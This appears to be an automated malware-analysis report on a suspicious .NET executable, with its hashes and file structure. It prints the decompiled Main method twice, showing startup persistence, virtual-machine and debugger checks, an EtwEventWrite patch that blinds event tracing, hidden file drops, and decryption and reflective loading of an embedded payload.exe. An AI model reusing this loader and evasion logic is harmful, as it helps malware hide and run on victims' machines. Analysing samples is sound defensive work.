Suspicious
Suspect

d4aba6e3ebc2526be21e175ae34a06fc

PE Executable
|
MD5: d4aba6e3ebc2526be21e175ae34a06fc
|
Size: 1.38 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
 Hash Value
MD5
d4aba6e3ebc2526be21e175ae34a06fc
Sha1
0be9666108a047d52d406141a8a28e40ff9de858
Sha256
6e6e691a7f98fc4086f2bec28b34b2474ab783e9408c611e789a00107a24c227
Sha384
270dba07b977811e980a1fcdbe203a1d52da5a1053747550bbe3d60eaca3654b07d42062c0f53a258db0e803f7e6c4be
Sha512
4face9ba2c6d5875ef0ed3471701c318d7de6cd604fd95495c6e129e3b265847a9370b97f5276de3365be1c91cc7c345531210256e8d4113456b010064b85b10
SSDeep
24576:4/KrQdQ3MD6X13W7Qr5eGxmqKbOBhofZGzbgkbbK+UibpR5elZRHN:4/Krle6X13W8r5eRqKbOBWf8bxvpR0l/
TLSH
585533D18F7045D5D5B196B0394CAB98A436F4344410AFAE88DCEE7DB32C9E26D3AB31

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
d4aba6e3ebc2526be21e175ae34a06fc
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
payload.exe
Informations
Name
 Value
Module Name

PIAhbwggsQ.tmp
Full Name

PIAhbwggsQ.tmp
EntryPoint

System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::Main(System.String[])
Scope Name

PIAhbwggsQ.tmp
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

PIAhbwggsQ
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

31
Main Method

System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::Main(System.String[])
Main IL Instruction Count

272
Main IL

call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() pop <null> call System.String System.Console::get_Title() call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::IsStartup(System.String) stloc.0 <null> ldloc.0 <null> brtrue.s IL_0028: leave.s IL_0043 call System.String System.Console::get_Title() call System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::InstallStartup(System.String) leave.s IL_0043: ldstr "Select * from Win32_ComputerSystem" stloc.1 <null> ldloc.1 <null> callvirt System.String System.Object::ToString() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Void System.Diagnostics.Process::Kill() leave.s IL_0043: ldstr "Select * from Win32_ComputerSystem" ldstr Select * from Win32_ComputerSystem newobj System.Void System.Management.ManagementObjectSearcher::.ctor(System.String) stloc.2 <null> ldloc.2 <null> callvirt System.Management.ManagementObjectCollection System.Management.ManagementObjectSearcher::Get() stloc.3 <null> ldloc.3 <null> callvirt System.Management.ManagementObjectCollection/ManagementObjectEnumerator System.Management.ManagementObjectCollection::GetEnumerator() stloc.s V_18 br IL_00E4: ldloc.s V_18 ldloc.s V_18 callvirt System.Management.ManagementBaseObject System.Management.ManagementObjectCollection/ManagementObjectEnumerator::get_Current() stloc.s V_4 ldloc.s V_4 ldstr Manufacturer callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() callvirt System.String System.String::ToLower() stloc.s V_5 ldloc.s V_5 ldstr microsoft corporation call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00B3: ldloc.s V_5 ldloc.s V_4 ldstr Model callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() callvirt System.String System.String::ToUpperInvariant() ldstr VIRTUAL callvirt System.Boolean System.String::Contains(System.String) brtrue.s IL_00DE: ldc.i4.1 ldloc.s V_5 ldstr vmware callvirt System.Boolean System.String::Contains(System.String) brtrue.s IL_00DE: ldc.i4.1 ldloc.s V_4 ldstr Model callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() ldstr VirtualBox call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00E4: ldloc.s V_18 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) ldloc.s V_18 callvirt System.Boolean System.Management.ManagementObjectCollection/ManagementObjectEnumerator::MoveNext() brtrue IL_0062: ldloc.s V_18 leave.s IL_00FE: ldloc.2 ldloc.s V_18 brfalse.s IL_00FD: endfinally ldloc.s V_18 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.2 <null> callvirt System.Void System.ComponentModel.Component::Dispose() ldc.i4.0 <null> stloc.s V_6 call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.IntPtr System.Diagnostics.Process::get_Handle() ldloca.s V_6 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::CheckRemoteDebuggerPresent(System.IntPtr,System.Boolean&) pop <null> call System.Boolean System.Diagnostics.Debugger::get_IsAttached() brtrue.s IL_012B: ldc.i4.m1 ldloc.s V_6 brtrue.s IL_012B: ldc.i4.m1 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::IsDebuggerPresent() brfalse.s IL_0131: ldstr "ntdll.dll" ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) ldstr ntdll.dll call System.IntPtr eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::LoadLibrary(System.String) stloc.s V_7 ldloc.s V_7 ldstr EtwEventWrite call System.IntPtr eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::GetProcAddress(System.IntPtr,System.String) stloc.s V_8 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> beq.s IL_016E: ldc.i4.1 ldc.i4.3 <null> newarr System.Byte stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_19 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_19 br.s IL_0181: stloc.s V_9 ldc.i4.1 <null> newarr System.Byte stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_20 stloc.s V_9 ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldsfld System.UInt32 eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::PAGE_EXECUTE_READWRITE ldloca.s V_10 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_10 ldloca.s V_10 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr payload.exe stloc.s V_11 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_12 ldloc.s V_12 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_21 ldc.i4.0 <null> stloc.s V_22 br IL_0290: ldloc.s V_22 ldnull <null> stloc.s V_13 newobj System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::.ctor() stloc.s V_14 ldloc.s V_14 ldloc.s V_21 ldloc.s V_22 ldelem.ref <null> stfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_11 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr UAC call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr .exe callvirt System.Boolean System.String::EndsWith(System.String) brtrue.s IL_0241: ldloc.s V_14 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr .bat callvirt System.Boolean System.String::EndsWith(System.String) brfalse.s IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::dJcliLYAxGvdRLIssiNj(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_13 brtrue.s IL_0279: ldloc.s V_13 ldloc.s V_14 ldftn System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_13 ldloc.s V_13 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() leave.s IL_028A: ldloc.s V_22 pop <null> leave.s IL_028A: ldloc.s V_22 ldloc.s V_22 ldc.i4.1 <null> add <null> stloc.s V_22 ldloc.s V_22 ldloc.s V_21 ldlen <null> conv.i4 <null> blt IL_01DF: ldnull ldloc.s V_11 call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::dJcliLYAxGvdRLIssiNj(System.String) ldstr 4W2BCCBs/6d91nambhXWRqj2tZMo3I/LTGCmWQclud4= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr wiCH8dhQRUYtjjg4kNgwyA== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::EEjpeNGxXWTIgJWTrJtz(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::immaBUXYWPVwBZrgcUJT(System.Byte[]) stloc.s V_15 ldc.i4.0 <null> newarr System.String stloc.s V_16 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_23 ldloc.s V_23 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_23 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_16 leave.s IL_02E9: ldloc.s V_15 pop <null> leave.s IL_02E9: ldloc.s V_15 ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_17 ldloc.s V_17 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_24 ldloc.s V_24 ldc.i4.0 <null> ldloc.s V_16 stelem.ref <null> ldloc.s V_24 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_031F: ret pop <null> ldloc.s V_17 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_031F: ret ret <null>
Module Name

PIAhbwggsQ.tmp
Full Name

PIAhbwggsQ.tmp
EntryPoint

System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::Main(System.String[])
Scope Name

PIAhbwggsQ.tmp
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

PIAhbwggsQ
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

31
Main Method

System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::Main(System.String[])
Main IL Instruction Count

272
Main IL

call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() pop <null> call System.String System.Console::get_Title() call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::IsStartup(System.String) stloc.0 <null> ldloc.0 <null> brtrue.s IL_0028: leave.s IL_0043 call System.String System.Console::get_Title() call System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::InstallStartup(System.String) leave.s IL_0043: ldstr "Select * from Win32_ComputerSystem" stloc.1 <null> ldloc.1 <null> callvirt System.String System.Object::ToString() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Void System.Diagnostics.Process::Kill() leave.s IL_0043: ldstr "Select * from Win32_ComputerSystem" ldstr Select * from Win32_ComputerSystem newobj System.Void System.Management.ManagementObjectSearcher::.ctor(System.String) stloc.2 <null> ldloc.2 <null> callvirt System.Management.ManagementObjectCollection System.Management.ManagementObjectSearcher::Get() stloc.3 <null> ldloc.3 <null> callvirt System.Management.ManagementObjectCollection/ManagementObjectEnumerator System.Management.ManagementObjectCollection::GetEnumerator() stloc.s V_18 br IL_00E4: ldloc.s V_18 ldloc.s V_18 callvirt System.Management.ManagementBaseObject System.Management.ManagementObjectCollection/ManagementObjectEnumerator::get_Current() stloc.s V_4 ldloc.s V_4 ldstr Manufacturer callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() callvirt System.String System.String::ToLower() stloc.s V_5 ldloc.s V_5 ldstr microsoft corporation call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00B3: ldloc.s V_5 ldloc.s V_4 ldstr Model callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() callvirt System.String System.String::ToUpperInvariant() ldstr VIRTUAL callvirt System.Boolean System.String::Contains(System.String) brtrue.s IL_00DE: ldc.i4.1 ldloc.s V_5 ldstr vmware callvirt System.Boolean System.String::Contains(System.String) brtrue.s IL_00DE: ldc.i4.1 ldloc.s V_4 ldstr Model callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() ldstr VirtualBox call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00E4: ldloc.s V_18 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) ldloc.s V_18 callvirt System.Boolean System.Management.ManagementObjectCollection/ManagementObjectEnumerator::MoveNext() brtrue IL_0062: ldloc.s V_18 leave.s IL_00FE: ldloc.2 ldloc.s V_18 brfalse.s IL_00FD: endfinally ldloc.s V_18 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.2 <null> callvirt System.Void System.ComponentModel.Component::Dispose() ldc.i4.0 <null> stloc.s V_6 call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.IntPtr System.Diagnostics.Process::get_Handle() ldloca.s V_6 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::CheckRemoteDebuggerPresent(System.IntPtr,System.Boolean&) pop <null> call System.Boolean System.Diagnostics.Debugger::get_IsAttached() brtrue.s IL_012B: ldc.i4.m1 ldloc.s V_6 brtrue.s IL_012B: ldc.i4.m1 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::IsDebuggerPresent() brfalse.s IL_0131: ldstr "ntdll.dll" ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) ldstr ntdll.dll call System.IntPtr eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::LoadLibrary(System.String) stloc.s V_7 ldloc.s V_7 ldstr EtwEventWrite call System.IntPtr eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::GetProcAddress(System.IntPtr,System.String) stloc.s V_8 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> beq.s IL_016E: ldc.i4.1 ldc.i4.3 <null> newarr System.Byte stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_19 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_19 br.s IL_0181: stloc.s V_9 ldc.i4.1 <null> newarr System.Byte stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_20 stloc.s V_9 ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldsfld System.UInt32 eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::PAGE_EXECUTE_READWRITE ldloca.s V_10 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_10 ldloca.s V_10 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr payload.exe stloc.s V_11 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_12 ldloc.s V_12 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_21 ldc.i4.0 <null> stloc.s V_22 br IL_0290: ldloc.s V_22 ldnull <null> stloc.s V_13 newobj System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::.ctor() stloc.s V_14 ldloc.s V_14 ldloc.s V_21 ldloc.s V_22 ldelem.ref <null> stfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_11 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr UAC call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr .exe callvirt System.Boolean System.String::EndsWith(System.String) brtrue.s IL_0241: ldloc.s V_14 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr .bat callvirt System.Boolean System.String::EndsWith(System.String) brfalse.s IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::dJcliLYAxGvdRLIssiNj(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_13 brtrue.s IL_0279: ldloc.s V_13 ldloc.s V_14 ldftn System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_13 ldloc.s V_13 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() leave.s IL_028A: ldloc.s V_22 pop <null> leave.s IL_028A: ldloc.s V_22 ldloc.s V_22 ldc.i4.1 <null> add <null> stloc.s V_22 ldloc.s V_22 ldloc.s V_21 ldlen <null> conv.i4 <null> blt IL_01DF: ldnull ldloc.s V_11 call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::dJcliLYAxGvdRLIssiNj(System.String) ldstr 4W2BCCBs/6d91nambhXWRqj2tZMo3I/LTGCmWQclud4= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr wiCH8dhQRUYtjjg4kNgwyA== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::EEjpeNGxXWTIgJWTrJtz(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::immaBUXYWPVwBZrgcUJT(System.Byte[]) stloc.s V_15 ldc.i4.0 <null> newarr System.String stloc.s V_16 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_23 ldloc.s V_23 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_23 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_16 leave.s IL_02E9: ldloc.s V_15 pop <null> leave.s IL_02E9: ldloc.s V_15 ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_17 ldloc.s V_17 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_24 ldloc.s V_24 ldc.i4.0 <null> ldloc.s V_16 stelem.ref <null> ldloc.s V_24 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_031F: ret pop <null> ldloc.s V_17 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_031F: ret ret <null>
d4aba6e3ebc2526be21e175ae34a06fc (1.38 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙